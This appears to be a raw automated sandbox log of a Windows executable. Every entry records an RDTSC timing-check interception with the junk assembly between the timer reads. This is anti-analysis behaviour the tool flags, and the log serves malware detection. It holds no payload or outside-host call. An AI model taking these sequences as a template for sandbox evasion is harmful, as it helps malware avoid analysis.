Source: C:\Users\user\Desktop\ZTM2pfyhu3.exe	RDTSC instruction interceptor: First address: 9B9CAE second address: 9B9CB9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\ZTM2pfyhu3.exe	RDTSC instruction interceptor: First address: 9B9CB9 second address: 9B9CBD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ZTM2pfyhu3.exe	RDTSC instruction interceptor: First address: 9B9CBD second address: 9B9CC5 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\ZTM2pfyhu3.exe	RDTSC instruction interceptor: First address: 9BF3DE second address: 9BF404 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jg 00007F88FCB145CEh 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F88FCB145CBh 0x00000014 push eax 0x00000015 push edx 0x00000016 push edx 0x00000017 pop edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\ZTM2pfyhu3.exe	RDTSC instruction interceptor: First address: 9BF404 second address: 9BF40C instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\ZTM2pfyhu3.exe	RDTSC instruction interceptor: First address: 9C243C second address: 9C244A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jne 00007F88FCB145C6h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\ZTM2pfyhu3.exe	RDTSC instruction interceptor: First address: 9C244A second address: 9C246D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 jmp 00007F88FCAE42A9h 0x0000000b push ebx 0x0000000c pop ebx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\ZTM2pfyhu3.exe	RDTSC instruction interceptor: First address: 9C246D second address: 9C2491 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jg 00007F88FCB145DDh 0x0000000d rdtsc
Source: C:\Users\user\Desktop\ZTM2pfyhu3.exe	RDTSC instruction interceptor: First address: 9C2491 second address: 9C249B instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pushad 0x00000004 popad 0x00000005 pop ecx 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\ZTM2pfyhu3.exe	RDTSC instruction interceptor: First address: 9C84C2 second address: 9C84C8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\ZTM2pfyhu3.exe	RDTSC instruction interceptor: First address: 9C84C8 second address: 9C84CE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\ZTM2pfyhu3.exe	RDTSC instruction interceptor: First address: 9204CC second address: 9204D2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\ZTM2pfyhu3.exe	RDTSC instruction interceptor: First address: 9C750A second address: 9C7511 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\ZTM2pfyhu3.exe	RDTSC instruction interceptor: First address: 9C7511 second address: 9C7527 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F88FCB145CEh 0x00000009 popad 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\ZTM2pfyhu3.exe	RDTSC instruction interceptor: First address: 96459C second address: 9645A2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\ZTM2pfyhu3.exe	RDTSC instruction interceptor: First address: 9CF9A5 second address: 9CF9CF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 pushad 0x00000006 jg 00007F88FCB145C6h 0x0000000c jmp 00007F88FCB145D5h 0x00000011 push edx 0x00000012 pop edx 0x00000013 push ecx 0x00000014 pop ecx 0x00000015 popad 0x00000016 push ebx 0x00000017 push ebx 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
Source: C:\Users\user\Desktop\ZTM2pfyhu3.exe	RDTSC instruction interceptor: First address: 9CF9CF second address: 9CF9D5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\ZTM2pfyhu3.exe	RDTSC instruction interceptor: First address: 9CF9D5 second address: 9CF9E0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 push edx 0x0000000a pop edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\ZTM2pfyhu3.exe	RDTSC instruction interceptor: First address: 9CDA0F second address: 9CDA1C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 jp 00007F88FCAE4296h 0x0000000d rdtsc
Source: C:\Users\user\Desktop\ZTM2pfyhu3.exe	RDTSC instruction interceptor: First address: 9CDA1C second address: 9CDA2A instructions: 0x00000000 rdtsc 0x00000002 jne 00007F88FCB145C6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push esi 0x0000000d pop esi 0x0000000e rdtsc
Source: C:\Users\user\Desktop\ZTM2pfyhu3.exe	RDTSC instruction interceptor: First address: 9CDB5E second address: 9CDB62 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ZTM2pfyhu3.exe	RDTSC instruction interceptor: First address: 9CDB62 second address: 9CDB7D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F88FCB145D5h 0x0000000b rdtsc
Source: C:\Users\user\Desktop\ZTM2pfyhu3.exe	RDTSC instruction interceptor: First address: 9CEDD9 second address: 9CEDE9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a jnc 00007F88FCAE4296h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\ZTM2pfyhu3.exe	RDTSC instruction interceptor: First address: 9CF0C5 second address: 9CF0D3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007F88FCB145C6h 0x0000000a popad 0x0000000b push edi 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\ZTM2pfyhu3.exe	RDTSC instruction interceptor: First address: 9CF0D3 second address: 9CF0DB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\ZTM2pfyhu3.exe	RDTSC instruction interceptor: First address: 9CF0DB second address: 9CF0EC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 popad 0x00000008 pushad 0x00000009 jne 00007F88FCB145CCh 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\ZTM2pfyhu3.exe	RDTSC instruction interceptor: First address: 9CF0EC second address: 9CF0F5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 push esi 0x00000006 pop esi 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\ZTM2pfyhu3.exe	RDTSC instruction interceptor: First address: 9CF3DE second address: 9CF3E4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\ZTM2pfyhu3.exe	RDTSC instruction interceptor: First address: 9CF3E4 second address: 9CF3F0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop ecx 0x00000006 pushad 0x00000007 pushad 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\ZTM2pfyhu3.exe	RDTSC instruction interceptor: First address: 9CF6C5 second address: 9CF6E2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F88FCB145D9h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\ZTM2pfyhu3.exe	RDTSC instruction interceptor: First address: 9CF6E2 second address: 9CF6EB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\ZTM2pfyhu3.exe	RDTSC instruction interceptor: First address: 9D4544 second address: 9D454A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\ZTM2pfyhu3.exe	RDTSC instruction interceptor: First address: 9D3BCB second address: 9D3BD0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\ZTM2pfyhu3.exe	RDTSC instruction interceptor: First address: 9D3BD0 second address: 9D3BD6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\ZTM2pfyhu3.exe	RDTSC instruction interceptor: First address: 9D3BD6 second address: 9D3BEB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 jo 00007F88FCAE4296h 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f ja 00007F88FCAE4296h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\ZTM2pfyhu3.exe	RDTSC instruction interceptor: First address: 9D3BEB second address: 9D3BEF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ZTM2pfyhu3.exe	RDTSC instruction interceptor: First address: 9D3D41 second address: 9D3D47 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\ZTM2pfyhu3.exe	RDTSC instruction interceptor: First address: 9D3D47 second address: 9D3D4B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ZTM2pfyhu3.exe	RDTSC instruction interceptor: First address: 9D3D4B second address: 9D3D51 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\ZTM2pfyhu3.exe	RDTSC instruction interceptor: First address: 9D3D51 second address: 9D3D5C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ecx 0x00000007 push ecx 0x00000008 pop ecx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\ZTM2pfyhu3.exe	RDTSC instruction interceptor: First address: 9D3D5C second address: 9D3D61 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\ZTM2pfyhu3.exe	RDTSC instruction interceptor: First address: 9D3D61 second address: 9D3D6B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jno 00007F88FCB145C6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\ZTM2pfyhu3.exe	RDTSC instruction interceptor: First address: 9D4235 second address: 9D4239 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ZTM2pfyhu3.exe	RDTSC instruction interceptor: First address: 9DB04A second address: 9DB04E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ZTM2pfyhu3.exe	RDTSC instruction interceptor: First address: 9E2188 second address: 9E21AF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 js 00007F88FCAE429Ch 0x0000000b jg 00007F88FCAE4296h 0x00000011 pop edi 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 push esi 0x00000017 pop esi 0x00000018 jmp 00007F88FCAE429Fh 0x0000001d rdtsc
Source: C:\Users\user\Desktop\ZTM2pfyhu3.exe	RDTSC instruction interceptor: First address: 9E21AF second address: 9E21BA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\ZTM2pfyhu3.exe	RDTSC instruction interceptor: First address: 9E21BA second address: 9E21C1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\ZTM2pfyhu3.exe	RDTSC instruction interceptor: First address: 9E21C1 second address: 9E21DD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F88FCB145D6h 0x00000009 push edx 0x0000000a pop edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\ZTM2pfyhu3.exe	RDTSC instruction interceptor: First address: 9E2479 second address: 9E247D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ZTM2pfyhu3.exe	RDTSC instruction interceptor: First address: 9E247D second address: 9E2498 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ebx 0x00000007 js 00007F88FCB145D8h 0x0000000d push ebx 0x0000000e pushad 0x0000000f popad 0x00000010 pop ebx 0x00000011 jo 00007F88FCB145CEh 0x00000017 push ebx 0x00000018 pop ebx 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
Source: C:\Users\user\Desktop\ZTM2pfyhu3.exe	RDTSC instruction interceptor: First address: 9E28D7 second address: 9E291C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F88FCAE42A3h 0x00000009 jc 00007F88FCAE4296h 0x0000000f popad 0x00000010 popad 0x00000011 pushad 0x00000012 jmp 00007F88FCAE42A2h 0x00000017 push eax 0x00000018 push edx 0x00000019 pushad 0x0000001a popad 0x0000001b jmp 00007F88FCAE429Fh 0x00000020 rdtsc
Source: C:\Users\user\Desktop\ZTM2pfyhu3.exe	RDTSC instruction interceptor: First address: 9E2FC8 second address: 9E2FD5 instructions: 0x00000000 rdtsc 0x00000002 jng 00007F88FCB145C6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\ZTM2pfyhu3.exe	RDTSC instruction interceptor: First address: 9E2FD5 second address: 9E2FF0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007F88FCAE4296h 0x0000000a pop eax 0x0000000b popad 0x0000000c jc 00007F88FCAE42A6h 0x00000012 push edx 0x00000013 pushad 0x00000014 popad 0x00000015 pushad 0x00000016 popad 0x00000017 pop edx 0x00000018 pushad 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
Source: C:\Users\user\Desktop\ZTM2pfyhu3.exe	RDTSC instruction interceptor: First address: 9EACFE second address: 9EAD03 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\ZTM2pfyhu3.exe	RDTSC instruction interceptor: First address: 9EA844 second address: 9EA851 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 jno 00007F88FCAE4296h 0x0000000d rdtsc
Source: C:\Users\user\Desktop\ZTM2pfyhu3.exe	RDTSC instruction interceptor: First address: 9F9BFD second address: 9F9C02 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\ZTM2pfyhu3.exe	RDTSC instruction interceptor: First address: 9F9C02 second address: 9F9C2E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F88FCAE42A5h 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F88FCAE42A3h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\ZTM2pfyhu3.exe	RDTSC instruction interceptor: First address: 9F9DA2 second address: 9F9DA8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\ZTM2pfyhu3.exe	RDTSC instruction interceptor: First address: 9FE5BF second address: 9FE5C5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\ZTM2pfyhu3.exe	RDTSC instruction interceptor: First address: A03BA7 second address: A03BD6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jmp 00007F88FCB145CFh 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 js 00007F88FCB145CAh 0x00000016 push edi 0x00000017 pop edi 0x00000018 pushad 0x00000019 popad 0x0000001a jmp 00007F88FCB145CBh 0x0000001f rdtsc
Source: C:\Users\user\Desktop\ZTM2pfyhu3.exe	RDTSC instruction interceptor: First address: A0276E second address: A02773 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\ZTM2pfyhu3.exe	RDTSC instruction interceptor: First address: A02773 second address: A02779 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\ZTM2pfyhu3.exe	RDTSC instruction interceptor: First address: A02779 second address: A02781 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push esi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\ZTM2pfyhu3.exe	RDTSC instruction interceptor: First address: A02781 second address: A02787 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\ZTM2pfyhu3.exe	RDTSC instruction interceptor: First address: A16170 second address: A1617E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jng 00007F88FCAE429Eh 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\ZTM2pfyhu3.exe	RDTSC instruction interceptor: First address: A14A70 second address: A14A7A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnp 00007F88FCB145C6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\ZTM2pfyhu3.exe	RDTSC instruction interceptor: First address: A14A7A second address: A14AA0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F88FCAE42A5h 0x00000007 jbe 00007F88FCAE4296h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pop edx 0x00000010 pop eax 0x00000011 push ecx 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\ZTM2pfyhu3.exe	RDTSC instruction interceptor: First address: A14AA0 second address: A14AA4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ZTM2pfyhu3.exe	RDTSC instruction interceptor: First address: A14AA4 second address: A14AAA instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\ZTM2pfyhu3.exe	RDTSC instruction interceptor: First address: A14AAA second address: A14AB3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\ZTM2pfyhu3.exe	RDTSC instruction interceptor: First address: A14BE4 second address: A14BF6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jc 00007F88FCAE4296h 0x00000010 push eax 0x00000011 pop eax 0x00000012 rdtsc
Source: C:\Users\user\Desktop\ZTM2pfyhu3.exe	RDTSC instruction interceptor: First address: A14BF6 second address: A14C02 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F88FCB145C6h 0x00000008 push esi 0x00000009 pop esi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\ZTM2pfyhu3.exe	RDTSC instruction interceptor: First address: A14C02 second address: A14C4F instructions: 0x00000000 rdtsc 0x00000002 jg 00007F88FCAE42ADh 0x00000008 jmp 00007F88FCAE42A7h 0x0000000d pushad 0x0000000e jc 00007F88FCAE4296h 0x00000014 push edi 0x00000015 pop edi 0x00000016 jmp 00007F88FCAE42A6h 0x0000001b popad 0x0000001c pop edx 0x0000001d pop eax 0x0000001e push eax 0x0000001f push edx 0x00000020 ja 00007F88FCAE429Ah 0x00000026 pushad 0x00000027 popad 0x00000028 push edi 0x00000029 pop edi 0x0000002a rdtsc
Source: C:\Users\user\Desktop\ZTM2pfyhu3.exe	RDTSC instruction interceptor: First address: A1523B second address: A1524E instructions: 0x00000000 rdtsc 0x00000002 jp 00007F88FCB145CCh 0x00000008 pushad 0x00000009 push edx 0x0000000a pop edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\ZTM2pfyhu3.exe	RDTSC instruction interceptor: First address: A1524E second address: A15254 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\ZTM2pfyhu3.exe	RDTSC instruction interceptor: First address: A185C5 second address: A185D2 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 js 00007F88FCB145C6h 0x00000009 pop edx 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\ZTM2pfyhu3.exe	RDTSC instruction interceptor: First address: A185D2 second address: A185D8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\ZTM2pfyhu3.exe	RDTSC instruction interceptor: First address: A1B11A second address: A1B122 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\ZTM2pfyhu3.exe	RDTSC instruction interceptor: First address: A1B122 second address: A1B155 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F88FCAE42A3h 0x00000008 push eax 0x00000009 pop eax 0x0000000a push esi 0x0000000b pop esi 0x0000000c pushad 0x0000000d popad 0x0000000e popad 0x0000000f jc 00007F88FCAE429Eh 0x00000015 jnp 00007F88FCAE4296h 0x0000001b push eax 0x0000001c pop eax 0x0000001d pop edx 0x0000001e pop eax 0x0000001f push edi 0x00000020 push edi 0x00000021 pushad 0x00000022 popad 0x00000023 push eax 0x00000024 push edx 0x00000025 rdtsc
Source: C:\Users\user\Desktop\ZTM2pfyhu3.exe	RDTSC instruction interceptor: First address: A1B155 second address: A1B160 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 push edi 0x0000000a pop edi 0x0000000b rdtsc
Source: C:\Users\user\Desktop\ZTM2pfyhu3.exe	RDTSC instruction interceptor: First address: A2225B second address: A2225F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ZTM2pfyhu3.exe	RDTSC instruction interceptor: First address: A2225F second address: A22263 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ZTM2pfyhu3.exe	RDTSC instruction interceptor: First address: A22263 second address: A2227C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F88FCAE42A0h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\ZTM2pfyhu3.exe	RDTSC instruction interceptor: First address: A2227C second address: A22291 instructions: 0x00000000 rdtsc 0x00000002 jp 00007F88FCB145CCh 0x00000008 jng 00007F88FCB145C6h 0x0000000e pushad 0x0000000f pushad 0x00000010 popad 0x00000011 pushad 0x00000012 popad 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\ZTM2pfyhu3.exe	RDTSC instruction interceptor: First address: A25579 second address: A2557F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\ZTM2pfyhu3.exe	RDTSC instruction interceptor: First address: A29A13 second address: A29A17 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ZTM2pfyhu3.exe	RDTSC instruction interceptor: First address: A37D71 second address: A37DA8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 jmp 00007F88FCAE42A3h 0x0000000a pushad 0x0000000b popad 0x0000000c pushad 0x0000000d popad 0x0000000e jnc 00007F88FCAE4296h 0x00000014 popad 0x00000015 popad 0x00000016 push eax 0x00000017 push edx 0x00000018 jp 00007F88FCAE429Eh 0x0000001e pushad 0x0000001f push eax 0x00000020 push edx 0x00000021 rdtsc
Source: C:\Users\user\Desktop\ZTM2pfyhu3.exe	RDTSC instruction interceptor: First address: A37DA8 second address: A37DC4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 jmp 00007F88FCB145D5h 0x0000000b popad 0x0000000c rdtsc
Source: C:\Users\user\Desktop\ZTM2pfyhu3.exe	RDTSC instruction interceptor: First address: A37DC4 second address: A37DCD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop edi 0x00000005 push ecx 0x00000006 pop ecx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\ZTM2pfyhu3.exe	RDTSC instruction interceptor: First address: A4258B second address: A42591 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
